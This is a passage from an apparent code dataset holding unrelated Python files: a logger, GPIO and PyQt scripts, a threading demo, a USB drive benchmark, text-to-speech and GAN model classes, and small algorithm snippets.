WARNING = logging.WARNING # 30\n WARN = logging.WARN # 30\n INFO = logging.INFO # 20\n DEBUG = logging.DEBUG # 10\n FINE = 5\n NOTSET = logging.NOTSET # 0\n\n def __init__(self):\n logging.Logger.__init__(self, \"LOGGER\", level=logging.NOTSET)\n\n # File Handler\n # Will create the file activity.log in the directory /logs\n # from the directory where the application have been launched\n basename = os.path.splitext(os.path.basename(sys.argv[0]))[0]\n # self.logs_directory = os.path.abspath(\"logs\") + os.path.sep + basename + os.path.sep\n self.logs_directory = tempfile.gettempdir() + \"/logs\" + os.path.sep + basename + os.path.sep\n os.makedirs(self.logs_directory, exist_ok=True)\n self.open_file_handlers = {}\n for level in (logging.WARNING, logging.INFO):\n self.add_filehandler(level)\n\n # Console Handler\n self.cons_handler = logging.StreamHandler()\n self.cons_handler.setFormatter(formatters[-1])\n self.cons_handler.setLevel(logging.INFO)\n 
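# Console mirrors INFO and above; the file handlers opened above write WARNING and INFO to separate files, and a DEBUG file can be attached later via add_debug_filehandler().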
self.addHandler(self.cons_handler)\n\n # Done\n self.debug(\"File and Console logging successfully initialised\")\n\n def add_filehandler(self, level):\n \"\"\"\n Add to self.handlers a new FileHandler\n His level is set with the argument 'level'\n :param level: a logging existing level\n :return: None\n \"\"\"\n assert isinstance(level, int), \"level must be an integer\"\n\n level_name = logging.getLevelName(level)\n filename = self.logs_directory + level_name + \".log\"\n file = open(filename, 'w')\n file.write(\"\\n-------------------------------------------------------------\")\n file.write(\"\\n LOG FILE\")\n file.write(\"\\n {}\".format(time.strftime(\"%b %d, %Y at %H:%M and %S seconds\", time.localtime())))\n file.write(\"\\n File log level:{}\".format(level_name))\n file.write(\"\\n Executing script:{}\".format(sys.argv[0]))\n file.write(\"\\n-------------------------------------------------------------\\n\\n\")\n file.close()\n file_handler = FileHandler(filename)\n file_handler.setLevel(level)\n if level != logging.DEBUG:\n file_handler.setFormatter(formatters[0])\n if level == logging.DEBUG:\n file_handler.setFormatter(formatters[2])\n self.addHandler(file_handler)\n self.open_file_handlers[level] = (1, file_handler)\n\n def add_debug_filehandler(self):\n if logging.DEBUG not in self.open_file_handlers:\n self.add_filehandler(logging.DEBUG)\n\n def fine(self, msg, *args, **kwargs):\n \"\"\"\n Log 'msg % args' with severity 'FINE'.\n\n To pass exception information, use the keyword argument exc_info with\n a true value, e.g.\n\n logger.fine(\"Houston, we have a %s\", \"interesting problem\", exc_info=1)\n \"\"\"\n if self.isEnabledFor(self.FINE):\n self._log(self.FINE, msg, args, **kwargs)\n\n\nLOGGER = PersonalizedLogger()\n# logging.addLevelName(LOGGER.FINE, \"FINE\")\n","repo_name":"ChreSyr/baopig","sub_path":"baopig/io/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"21721171458","text":"# Script to send a trigger signal\n\nimport machine\nimport time\n\n# Set up GPIO pins\npin = machine.Pin(17, machine.Pin.OUT)\n\n# Send trigger signal\nwhile True:\n pin.on()\n print(\"on\")\n time.sleep(0.3)\n pin.off()\n print(\"off\")\n time.sleep(0.3)\n","repo_name":"Duesentrieb71/IRS_CanSat","sub_path":"Old_tests/simple_tx.py","file_name":"simple_tx.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"14882301064","text":"# Desarrolle un programa que permita desplegar una GUI que permita ingresar una palabra y\n# al presionar un boton, se muestre la palabra al rev ́es.\nimport sys\nfrom PyQt6.QtCore import QSize, Qt\nfrom PyQt6.QtWidgets import QApplication, QMainWindow, QVBoxLayout, QLabel, QPushButton, QWidget, QLineEdit\n\nclass Ventana(QMainWindow):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(f\"GUI 2\")\n self.setFixedSize(QSize(200,200))\n #Elementos\n instruccion = QLabel(f\"Ingresa una palabra,\\nluego presiona el boton\\npara invertirla.\")\n instruccion.setAlignment(Qt.AlignmentFlag.AlignCenter)\n self.caja_de_texto = QLineEdit()\n self.palabra = QLabel(\"\")\n self.palabra.setAlignment(Qt.AlignmentFlag.AlignCenter)\n boton = QPushButton(\"Invertir\")\n boton.clicked.connect(lambda: self.reves(self.caja_de_texto.text()))\n #layout\n layout = QVBoxLayout()\n #elementos al layout\n layout.addWidget(instruccion)\n 
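# Widgets stack top to bottom in the QVBoxLayout: instruction label, input box, result label, button.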
layout.addWidget(self.caja_de_texto)\n layout.addWidget(self.palabra)\n layout.addWidget(boton)\n #insertar layout\n contenedor = QWidget()\n contenedor.setLayout(layout)\n self.setCentralWidget(contenedor)\n\n def reves(self, palabra):\n aux = \"\"\n palabra = list(palabra)\n palabra.reverse()\n for i in range(len(palabra)):\n aux += palabra[i]\n self.caja_de_texto.setText(\"\")\n self.palabra.setText(aux)\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n ventana = Ventana()\n ventana.show()\n\n app.exec()","repo_name":"vicenteJavierveloso/GUI","sub_path":"GUI2.py","file_name":"GUI2.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"41886361151","text":"import logging\nimport threading\nimport time\nimport concurrent.futures\n\n\ndef fib(n):\n if n <= 1 :\n return n\n else:\n return fib(n-1) + fib(n-2)\n\nclass FakeDatabase:\n def __init__(self):\n self.value = 0\n\n def update(self, name):\n logging.info(\"Thread %s: starting update\", name)\n local_copy = self.value\n local_copy += 1\n logging.info(\"Thread %s: Before sleeping\", name)\n \n # Probably context switching goes here \n # fib(30) # could use time.sleep here as well\n self.value = local_copy\n logging.info(\"Thread %s: finishing update\", name)\n\n\nif __name__ == \"__main__\":\n format = \"%(asctime)s: %(message)s\"\n logging.basicConfig(format=format, level=logging.INFO,\n datefmt=\"%H:%M:%S\")\n\n database = FakeDatabase()\n logging.info(\"Testing update. Starting value is %d.\", database.value)\n with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:\n for index in range(2):\n executor.submit(database.update, index)\n logging.info(\"Testing update. Ending value is %d.\", database.value)\n","repo_name":"robinnarsinghranabhat/Python_Concurrency_Projects","sub_path":"concurrency_snippets/threading_concepts/multiple_threads_without_lock.py","file_name":"multiple_threads_without_lock.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"70975703674","text":"import os\nimport time\nimport subprocess\nimport random\nimport math\nimport traceback\n\ndef getDevices():\n RawDevices = subprocess.check_output(\n \"wmic logicaldisk where drivetype=2 get deviceid, volumename, description, volumeserialnumber, Size, Filesystem, freespace /format:list\",\n shell=True)\n\n RawDevices += subprocess.check_output(\n \"wmic logicaldisk where drivetype=3 get deviceid, volumename, description, volumeserialnumber, Size, Filesystem, freespace /format:list\",\n shell=True)\n Devices = RawDevices.decode().split(\"\\n\")\n X = [elem.strip().split(\"=\") for elem in Devices]\n Final = [x for x in X if x != ['']]\n myDict = {}\n for sub_list in Final:\n key, value = sub_list[0], sub_list[1]\n if key in myDict:\n myDict[key].append(value)\n else:\n myDict[key] = [value]\n\n if 'C:' in myDict['DeviceID']:\n temp = myDict['DeviceID'].index('C:')\n for key in myDict:\n del myDict[key][int(temp)]\n\n return (myDict)\n\n\ndef writeFile(letterDrive, fileSize, blockSize): # inputs: str letterDrive to access. Size of write\n numWrites = (fileSize * 1024) / blockSize\n data = bytearray(1024 * blockSize) # create the array for the data. Must be strictly sized\n for byte in range(len(data)):\n data[byte] = random.randint(0x0, 0xff) # allocate the data to the same values. 
hex aa is alternating bits\n with open('%s:\output_file' % letterDrive, 'bw+') as fout:\n fout.seek(0)\n start = time.perf_counter()\n for i in range(int(numWrites)):\n fout.write(data) # write to file\n os.fsync(fout)\n end = time.perf_counter()\n fout.truncate()\n fout.flush()\n os.fsync(fout)\n fout.close()\n\n del data\n timeTaken = end - start\n return (timeTaken) # return time taken\n\n\ndef readFile(fileLocation, blockSize,i): # inputs: str full fileLocation to access. Size of read\n fileSize = os.stat(fileLocation).st_size\n numReads = fileSize / (blockSize * 1024)\n filename = 'output_file_test' + str(i)\n #mW.addText(numReads)\n print(numReads)\n try:\n start = time.perf_counter()\n with open(fileLocation, \"rb\",1024 * blockSize) as fin: # open the file\n with open(filename, \"wb+\", 1024 * blockSize) as fout:\n for i in range(math.ceil(numReads)):\n #fout.write(fin.read(1024 * blockSize)) # read in up to the blockSize in kB\n data = fin.read(1024 * blockSize)\n fin.flush()\n #os.fsync(fin)\n #print(data)\n fin.flush()\n fout.write(data)\n fout.flush()\n os.fsync(fout.fileno())\n end = time.perf_counter()\n fin.close()\n #print(data)\n timeTaken = end - start\n except Exception as e:\n print(str(e))\n traceback.print_exc()\n\n try:\n print(\"written\")\n os.remove(filename)\n except:\n print(\"file not found\")\n print(timeTaken)\n return (timeTaken) # return time taken\n\n\ndef benchmarkDevice(mainWindow, app, letterDrive, smallBlockSize, bigBlockSize, fileSize, write=True, read=True):\n # Write section\n writeflag = True\n writeTimes = []\n readTimes = []\n blockSizes = []\n mW = mainWindow\n for i in range(smallBlockSize, bigBlockSize + 1):\n if write:\n if read:\n tempString = \"Writing at \" + str(2 ** i) + \" kB blockSize \" + \"(Test \" + str(\n (i - smallBlockSize + 1) * 2 - 1) + \" of \" + str((bigBlockSize - smallBlockSize + 1) * 2) + \")\"\n else:\n tempString = \"Writing at \" + str(2 ** i) + \" kB blockSize \" + \"(Test \" + str(\n i - smallBlockSize + 1) + \" of \" + str((bigBlockSize - smallBlockSize + 1)) + \")\"\n mainWindow.addText(tempString)\n app.processEvents()\n writeTimes.append(fileSize / (writeFile(letterDrive, fileSize, 2 ** i)))\n writeflag = False\n # os.remove('%s:\output_file' % letterDrive)\n elif writeflag:\n mainWindow.addText(\"Writing a Temporary File for Reading Tests\")\n app.processEvents()\n writeFile(letterDrive, fileSize, 2 ** 8)\n writeflag = False\n if read:\n if write:\n tempString = \"Reading at \" + str(2 ** i) + \" kB blockSize \" + \"(Test \" + str(\n (i - smallBlockSize + 1) * 2) + \" of \" + str((bigBlockSize - smallBlockSize + 1) * 2) + \")\"\n else:\n tempString = \"Reading at \" + str(2 ** i) + \" kB blockSize \" + \"(Test \" + str(\n (i - smallBlockSize + 1)) + \" of \" + str((bigBlockSize - smallBlockSize + 1)) + \")\"\n mainWindow.addText(tempString)\n app.processEvents()\n readTimes.append(fileSize / (readFile('%s:\output_file' % letterDrive, 2 ** i, i)))#'%s:Iron Man 2008.720p.BrRip.x264.YIFY.mp4'\n blockSizes.append(2 ** i)\n os.remove('%s:\output_file' % letterDrive)\n\n # if(read and write):\n # return(blockSizes,writeTimes,readTimes)\n # elif(read):\n # return(blockSizes,readTimes)\n # elif(write):\n # return(blockSizes,writeTimes)\n # else:\n # return(blockSizes)\n return (blockSizes, writeTimes, readTimes)\n\n\nif __name__ == \"__main__\":\n print(benchmarkDevice(\"D\", 0, 16, 
100))\n","repo_name":"MilesWT/USB-Benchmark","sub_path":"wmicAPI.py","file_name":"wmicAPI.py","file_ext":"py","file_size_in_byte":5443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"37639262671","text":"import os\r\nimport numpy as np\r\nimport pandas as pd\r\nimport tensorflow as tf\r\n\r\nfrom models.tts.tacotron2 import Tacotron2\r\nfrom models.siamese.audio_siamese import AudioSiamese\r\nfrom models.weights_converter import partial_transfer_learning\r\nfrom utils import load_embedding, save_embeddings, select_embedding, sample_df\r\n\r\n_default_embeddings_filename = 'default_embeddings'\r\n\r\nclass SV2TTSTacotron2(Tacotron2):\r\n def __init__(self,\r\n lang,\r\n speaker_encoder_name,\r\n speaker_embedding_dim, \r\n use_utterance_embedding = False,\r\n \r\n **kwargs\r\n ):\r\n self.__embeddings = None\r\n self.__speaker_encoder = None\r\n\r\n self.speaker_embedding_dim = speaker_embedding_dim\r\n self.use_utterance_embedding = use_utterance_embedding\r\n self.speaker_encoder_name = speaker_encoder_name\r\n \r\n super().__init__(lang = lang, **kwargs)\r\n \r\n def _init_folders(self):\r\n super()._init_folders()\r\n os.makedirs(self.embedding_dir, exist_ok=True)\r\n \r\n def init_train_config(self,\r\n augment_speaker_embedding = False,\r\n use_utterance_embedding = False,\r\n ** kwargs\r\n ):\r\n self.augment_speaker_embedding = augment_speaker_embedding\r\n self.use_utterance_embedding = use_utterance_embedding\r\n \r\n super().init_train_config(** kwargs)\r\n \r\n def _build_model(self, **kwargs):\r\n super()._build_model(\r\n encoder_speaker_embedding_dim = self.speaker_embedding_dim,\r\n ** kwargs\r\n )\r\n \r\n @property\r\n def embedding_dir(self):\r\n return os.path.join(self.folder, 'embeddings')\r\n \r\n @property\r\n def has_default_embedding(self):\r\n return len(os.listdir(self.embedding_dir)) > 0\r\n \r\n @property\r\n def default_embedding_file(self):\r\n return os.path.join(self.embedding_dir, _default_embeddings_filename)\r\n \r\n @property\r\n def input_signature(self):\r\n return (\r\n tf.TensorSpec(shape = (None, None), dtype = tf.int32),\r\n tf.TensorSpec(shape = (None,), dtype = tf.int32),\r\n tf.TensorSpec(shape = (None, self.speaker_embedding_dim), dtype = tf.float32),\r\n tf.TensorSpec(shape = (None, None, self.n_mel_channels), dtype = tf.float32),\r\n tf.TensorSpec(shape = (None,), dtype = tf.int32),\r\n )\r\n \r\n @property\r\n def training_hparams(self):\r\n return super().training_hparams(\r\n augment_speaker_embedding = False,\r\n use_utterance_embedding = False\r\n )\r\n \r\n @property\r\n def embedding_dim(self):\r\n return self.speaker_embedding_dim\r\n \r\n @property\r\n def embeddings(self):\r\n return self.__embeddings\r\n \r\n @property\r\n def speaker_encoder(self):\r\n if self.__speaker_encoder is None:\r\n self.__speaker_encoder = AudioSiamese(nom = self.speaker_encoder_name)\r\n self.__speaker_encoder.get_model().trainable = False\r\n return self.__speaker_encoder\r\n \r\n def __str__(self):\r\n des = super().__str__()\r\n des += \"Speaker embedding dim : {}\\n\".format(self.speaker_embedding_dim)\r\n if self.speaker_encoder_name is not None:\r\n des += \"Speaker encoder : {}\\n\".format(self.speaker_encoder_name)\r\n return des\r\n \r\n def compile(self, loss_config = {}, ** kwargs):\r\n if 'mel_loss' in loss_config and 'similarity' in loss_config['mel_loss']:\r\n self.speaker_encoder\r\n loss_config.setdefault('similarity_function', self.pred_similarity)\r\n \r\n 
super().compile(loss_config = loss_config, ** kwargs)\r\n \r\n def pred_similarity(self, y_true, y_pred):\r\n score = self.speaker_encoder([y_true, y_pred])\r\n return score if not self.speaker_encoder.embed_distance else 1. - score\r\n \r\n def load_speaker_encoder(self, name = None):\r\n if self.__speaker_encoder is not None:\r\n if name is None or self.__speaker_encoder.nom == name:\r\n return\r\n \r\n if name is None and self.speaker_encoder_name is None:\r\n raise ValueError(\"You must provide the name for the speaker encoder !\")\r\n \r\n if self.speaker_encoder_name is None:\r\n self.speaker_encoder_name = name\r\n else:\r\n name = self.speaker_encoder_name\r\n \r\n self.__speaker_encoder = AudioSiamese(nom = name)\r\n \r\n def set_default_embeddings(self, embeddings, filename = None):\r\n self.add_embeddings(embeddings, _default_embeddings_filename)\r\n \r\n def add_embeddings(self, embeddings, name):\r\n save_embeddings(self.embedding_dir, embeddings, embedding_name = name)\r\n \r\n def set_embeddings(self, embeddings):\r\n self.__embeddings = embeddings\r\n if not self.has_default_embedding:\r\n self.set_default_embeddings(embeddings)\r\n \r\n def load_embeddings(self, directory = None, filename = None, ** kwargs):\r\n if not self.has_default_embedding and directory is None:\r\n raise ValueError(\"No default embeddings available !\\n Use the 'set_default_embeddings()' or 'set_embeddings()' method\")\r\n \r\n if directory is None:\r\n directory = self.embedding_dir\r\n if len(os.listdir(self.embedding_dir)) == 1:\r\n filename = os.listdir(self.embedding_dir)[0]\r\n if filename is None:\r\n filename = _default_embeddings_filename\r\n \r\n embeddings = load_embedding(\r\n directory,\r\n embedding_dim = self.embedding_dim, \r\n embedding_name = filename,\r\n ** kwargs\r\n )\r\n \r\n self.set_embeddings(embeddings)\r\n \r\n def infer(self, text, text_length, spk_embedding, * args, ** kwargs):\r\n if tf.rank(spk_embedding) == 1:\r\n spk_embedding = tf.expand_dims(spk_embedding, axis = 0)\r\n if not isinstance(text, str) and tf.shape(spk_embedding)[0] < tf.shape(text)[0]:\r\n spk_embedding = tf.tile(spk_embedding, [tf.shape(text)[0], 1])\r\n \r\n return super().infer([text, spk_embedding], text_length, * args, ** kwargs)\r\n \r\n def embed(self, audios, ** kwargs):\r\n self.load_speaker_encoder()\r\n return self.__speaker_encoder.embed(audios, ** kwargs)\r\n \r\n def get_speaker_embedding(self, data):\r\n \"\"\" This function is used in `encode_data` and must return a single embedding \"\"\"\r\n def load_np(filename):\r\n return np.load(filename.numpy().decode('utf-8'))\r\n \r\n embedding = data\r\n if isinstance(data, (dict, pd.Series)):\r\n embedding_key = 'speaker_embedding'\r\n if self.use_utterance_embedding and 'embedding' in data:\r\n embedding_key = 'embedding'\r\n embedding = data[embedding_key]\r\n \r\n if isinstance(embedding, tf.Tensor) and embedding.dtype == tf.string:\r\n embedding = tf.py_function(load_np, [embedding], Tout = tf.float32)\r\n embedding.set_shape([self.speaker_embedding_dim])\r\n elif isinstance(embedding, str):\r\n embedding = np.load(embedding)\r\n \r\n return embedding\r\n \r\n def encode_data(self, data):\r\n text, text_length, mel_input, mel_length, mel_output, gate = super().encode_data(data)\r\n \r\n embedded_speaker = self.get_speaker_embedding(data)\r\n \r\n return text, text_length, embedded_speaker, mel_input, mel_length, mel_output, gate\r\n \r\n def filter_data(self, text, text_length, embedded_speaker, mel_input, \r\n mel_length, mel_output, 
gate):\r\n return super().filter_data(\r\n text, text_length, mel_input, mel_length, mel_output, gate\r\n )\r\n \r\n def augment_embedding(self, embedding):\r\n return tf.cond(\r\n tf.random.uniform(()) < self.augment_prct,\r\n lambda: embedding + tf.random.normal(tf.shape(embedding), stddev = 0.025),\r\n lambda: embedding\r\n )\r\n \r\n def augment_data(self, text, text_length, embedded_speaker, mel_input, \r\n mel_length, mel_output, gate):\r\n mel_input = self.augment_mel(mel_input)\r\n if self.augment_speaker_embedding:\r\n embedded_speaker = self.augment_embedding(embedded_speaker)\r\n \r\n return text, text_length, embedded_speaker, mel_input, mel_length, mel_output, gate\r\n \r\n def preprocess_data(self, text, text_length, embedded_speaker, mel_input, \r\n mel_length, mel_output, gate):\r\n (text, text_length, mel_input, mel_length), target = super().preprocess_data(\r\n text, text_length, mel_input, mel_length, mel_output, gate\r\n )\r\n \r\n return (text, text_length, embedded_speaker, mel_input, mel_length), target\r\n \r\n def get_dataset_config(self, **kwargs):\r\n config = super().get_dataset_config(**kwargs)\r\n config['pad_kwargs'] = {\r\n 'padded_shapes' : (\r\n (None,), (), (self.speaker_embedding_dim,), (None, self.n_mel_channels), (),\r\n (None, self.n_mel_channels), (None,)\r\n ),\r\n 'padding_values' : (self.blank_token_idx, 0, 0., 0., 0, 0., 1.)\r\n }\r\n \r\n return config\r\n \r\n def train(self, x, * args, ** kwargs):\r\n if isinstance(x, pd.DataFrame) and not self.has_default_embedding:\r\n self.set_default_embeddings(sample_df(x, n = 50, n_sample = 10))\r\n \r\n return super().train(x, * args, ** kwargs)\r\n \r\n def embed_and_predict(self,\r\n audios,\r\n sentences, \r\n ** kwargs\r\n ):\r\n embeddings = self.embed(audios)\r\n \r\n return self.predict(sentences, embeddings = embeddings, ** kwargs)\r\n \r\n def predict(self,\r\n * args,\r\n embeddings = None,\r\n embedding_mode = {},\r\n overwrite = True,\r\n ** kwargs\r\n ):\r\n \"\"\"\r\n Perform Tacotron-2 inference on all phrases\r\n Arguments :\r\n - args / kwargs : args passed to super().predict()\r\n - embeddings : the embeddings to use as input (only 1 is selected from this set and effectively used)\r\n - embedding_mode : kwargs passed to `select_embedding()`\r\n Return : result of super().predict()\r\n \r\n Note : currently we just save the resulting audio for a given sentence but not the speaker / embedding used to generate it. 
\r\n So it can be more interesting to put `overwrite = True` for this model as it is basically used to generate audio with multiple voices (it is the reason why this argument is overriden to `True` in this function)\r\n \"\"\"\r\n # load embeddings if needed\r\n if embeddings is not None:\r\n self.set_embeddings(embeddings)\r\n elif self.embeddings is None:\r\n self.load_embeddings()\r\n \r\n if not self.use_utterance_embedding:\r\n embedding_mode.setdefault('mode', 'mean')\r\n \r\n selected_embedding = select_embedding(self.embeddings, ** embedding_mode)\r\n selected_embedding = tf.expand_dims(\r\n tf.cast(selected_embedding, tf.float32), axis = 0\r\n )\r\n \r\n return super().predict(\r\n * args, spk_embedding = selected_embedding, overwrite = overwrite, ** kwargs\r\n )\r\n \r\n def get_config(self, *args, **kwargs):\r\n config = super().get_config(*args, **kwargs)\r\n config['speaker_embedding_dim'] = self.speaker_embedding_dim\r\n config['use_utterance_embedding'] = self.use_utterance_embedding\r\n config['speaker_encoder_name'] = self.speaker_encoder_name\r\n \r\n return config\r\n \r\n @classmethod\r\n def build_from_sv2tts_pretrained(cls, \r\n nom,\r\n pretrained_name = 'sv2tts_tacotron2',\r\n ** kwargs\r\n ):\r\n with tf.device('cpu') as device: \r\n pretrained_model = SV2TTSTacotron2(nom = pretrained_name)\r\n \r\n kwargs.setdefault('lang', pretrained_model.lang)\r\n kwargs.setdefault('text_encoder', pretrained_model.text_encoder)\r\n kwargs.setdefault('speaker_encoder_name', pretrained_model.speaker_encoder_name)\r\n kwargs.setdefault('speaker_embedding_dim', pretrained_model.speaker_embedding_dim)\r\n \r\n instance = cls(nom = nom, max_to_keep = 1, pretrained_name = pretrained_name, ** kwargs)\r\n\r\n partial_transfer_learning(instance.tts_model, pretrained_model.tts_model)\r\n \r\n instance.save()\r\n \r\n return instance\r\n \r\n","repo_name":"Ca-ressemble-a-du-fake/text_to_speech","sub_path":"models/tts/sv2tts_tacotron2.py","file_name":"sv2tts_tacotron2.py","file_ext":"py","file_size_in_byte":13155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"95"} +{"seq_id":"4706216754","text":"def solution(num, total):\n answer = list()\n if num == 1:\n return [total]\n n = (total + 1) // num - ((num + 1) // 2 - 1)\n for _ in range(num):\n answer.append(n)\n n += 1\n return answer\n\n","repo_name":"Daeho-Son/PS","sub_path":"Programmers/Lv_0/연속된_수의_합/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"12955195959","text":"from __future__ import absolute_import, unicode_literals\n\ntry:\n from functools import lru_cache\nexcept ImportError:\n from functools32.functools32 import lru_cache\n\nfrom copy import deepcopy\nfrom numpy import matrix, linspace, meshgrid, sin, cos, pi, sqrt, multiply, \\\n random as nprandom\n\n\n@lru_cache(maxsize=100)\ndef _points_in_surface_sphere(num_of_points):\n \"\"\"Return a point in the surface of the sphere.\n\n :param num_of_points: how many point to describe the surface\n :return: points\n \"\"\"\n row = int(sqrt(num_of_points))\n if num_of_points % (row**2) > 0:\n row = row + 1\n [phi, theta] = meshgrid(linspace(0, 2 * pi, row), linspace(0, pi, row))\n phi = matrix(phi)\n theta = matrix(theta)\n x = multiply(sin(theta), cos(phi))\n y = multiply(sin(theta), sin(phi))\n z = cos(theta)\n\n return list(map(lambda x, y, z: matrix([x, y, z]), x.A1, y.A1, z.A1))\n\n\ndef 
generate_points_in_surface_sphere(center, radius, num_of_points):\n \"\"\"Generate a point on sphere surface defined by center and radius.\n\n :param center: sphere center\n :param radius: sphere radius\n :param num_of_points: how many points to describe the surface\n :return: point as matrix\n \"\"\"\n points = iter(_points_in_surface_sphere(num_of_points))\n while True:\n yield radius * next(points) + center\n\n\ndef generate_points_random_in_surface_sphere(center, radius, random=None):\n \"\"\"Generate random points on sphere surface defined by center and radius.\n\n e.g. generate randomly point around center [10, 10, 10] distant 4 from it.\n\n .. code-block:: python\n\n from numpy import matrix\n center = matrix([10, 10, 10])\n radius = 4\n generator = generate_points_random_in_surface_sphere(center, radius)\n point = next(generator)\n\n :param center: sphere center\n :param radius: shere radius\n :param random: random number generator\n :return: point as matrix\n \"\"\"\n while True:\n random = random or nprandom\n phi = 2 * pi * random.random()\n theta = pi * random.random()\n x = radius * sin(theta) * cos(phi)\n y = radius * sin(theta) * sin(phi)\n z = radius * cos(theta)\n yield matrix([x, y, z]) + center\n\n\ndef generate_sequential_points(start_point, random=None):\n \"\"\"Generate sequential points.\n\n :param start_point: point where to start\n :param random: random generator\n :return: next point\n \"\"\"\n point = deepcopy(start_point)\n random = random or nprandom\n while True:\n point = point + random.random() - matrix([0.5, 0.5, 0.5])\n yield point\n\n\ndef distance(point_1, point_2):\n \"\"\"Compute the euclidean distance from the two points.\"\"\"\n return sqrt(sum((point_1-point_2).A[0]**2))\n","repo_name":"hachreak/pylocating","sub_path":"src/pylocating/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"10626705005","text":"from graphs import Graph\n\ndef bfs(graph, source):\n if source not in graph.vertices():\n raise Error(\"bfs: source is not in graph\")\n parent = {source: None}\n levels = {source: 0}\n current_level = 1\n frontier = [source]\n \n while frontier:\n next_frontier = []\n for u in frontier:\n for v in graph.adj_list(u):\n if v not in parent:\n parent[v] = u\n levels[v] = current_level\n next_frontier.append(v)\n current_level += 1\n frontier = next_frontier\n return (parent, levels)\n\nif __name__ == '__main__':\n g = Graph()\n for key in [1, 2, 3, 4]:\n g.add_node(key)\n g.add_edge(1, 2)\n g.add_edge(2, 3)\n g.add_edge(3, 4)\n g.add_edge(4, 1)\n print(g)\n parent, levels = bfs(g, 1)\n print(parent, levels)\n","repo_name":"jlin22/algs_ds","sub_path":"python/graphs/bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"10212466446","text":"def hello():\r\n print(\"hello world this is just a test\")\r\n\r\nisRunning = True\r\n\r\n\r\ndef MyStrip(word):\r\n newWord = \"\"\r\n for letter in word: \r\n if(letter) == \" \":\r\n continue\r\n newWord = newWord + letter\r\n return newWord\r\n\r\nwhile isRunning:\r\n command = input(\" >> \")\r\n command = MyStrip(command)\r\n if(command.lower() == \"do\"):\r\n hello()\r\n elif command.lower()==\"exit\":\r\n isRunning = False\r\n\r\n\r\n","repo_name":"AhmedSama/python-chatroom","sub_path":"chat room 
python/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"19045778155","text":"\n__name__ = 'notebook_wide_screen'\n\n__version__ = '0.1.1'\n\n__description__ = 'Enable user to display notebook in very wide screens - if notebook is trusted'\n__author__ = 'oscar6echo'\n__author_email__ = 'olivier.borderies@gmail.com'\n__url__ = 'https://github.com/oscar6echo/{}'.format(__name__)\n__download_url__ = 'https://github.com/oscar6echo/{}/tarball/{}'.format(__name__,\n __version__)\n__keywords__ = ['python', 'display', 'css']\n__license__ = 'MIT'\n__classifiers__ = ['Development Status :: 4 - Beta',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6'\n ]\n__include_package_data__ = True\n__package_data__ = {\n 'templates':\n ['templates/main.html',\n 'templates/wideScreen.css',\n 'templates/notice_long.md',\n 'templates/notice_safe.txt',\n 'templates/notice_short.md',\n ]\n}\n","repo_name":"oscar6echo/notebook-wide-screen","sub_path":"notebook_wide_screen/__meta__.py","file_name":"__meta__.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"25731294466","text":"import torch\nfrom torch import nn\nfrom .translation_generator import Generator\nfrom .discriminator_wrapper import DiscriminatorWrapper\nfrom .discriminator_loss import DiscriminatorLoss\nfrom .perceptual_loss import FeatureExtractor\nfrom itertools import chain\nfrom src import utils\nfrom torch.autograd import Variable\nimport os\n\n\n\nclass Model(nn.Module):\n\n def __init__(self, opt):\n super(Model, self).__init__()\n\n self.gpu_id = opt.gpu_ids[0]\n self.weights_path = os.path.join(opt.experiment_path, 'checkpoints')\n\n # Generators\n self.gen_B = Generator(opt, 'B', opt.gen_type_name_B)\n\n # Discriminators\n self.dis_B = DiscriminatorWrapper(opt, 'B')\n\n # Load weights\n utils.load_checkpoint(self, opt.which_epoch, opt.pretrained_gen_path)\n\n # Print architectures\n print('\\nGen A to B\\n')\n num_params = 0\n for p in self.gen_B.parameters():\n num_params += p.numel()\n print(self.gen_B)\n print('Number of parameters: %d' % num_params)\n\n print('\\nDis B\\n')\n num_params = 0\n for p in self.dis_B.parameters():\n num_params += p.numel()\n print(self.dis_B)\n print('Number of parameters: %d' % num_params)\n\n self.gen_params = self.gen_B.parameters()\n\n self.dis_params = self.dis_B.parameters()\n\n # Losses\n self.crit_dis_B = DiscriminatorLoss(opt, self.dis_B)\n\n # If an encoder is required, load the weights\n if (opt.mse_loss_type_B == 'perceptual' or\n hasattr(self, 'dis_B') and self.dis_B.use_encoder):\n\n # Load encoder\n if opt.enc_type[:5] == 'vgg19':\n layers = '1,6,11,20,29'\n\n self.enc = FeatureExtractor(\n input_range='tanh',\n net_type=opt.enc_type,\n layers=layers).eval()\n\n print('')\n print(self.enc)\n print('')\n\n else:\n\n self.enc = None\n\n self.crit_mse_A = utils.get_criterion(\n opt.mse_loss_type_A, \n opt.mse_loss_weight_A,\n self.enc)\n\n # Pretrained aux classifier/regressor\n if opt.pretrained_aux_path:\n\n self.aux = 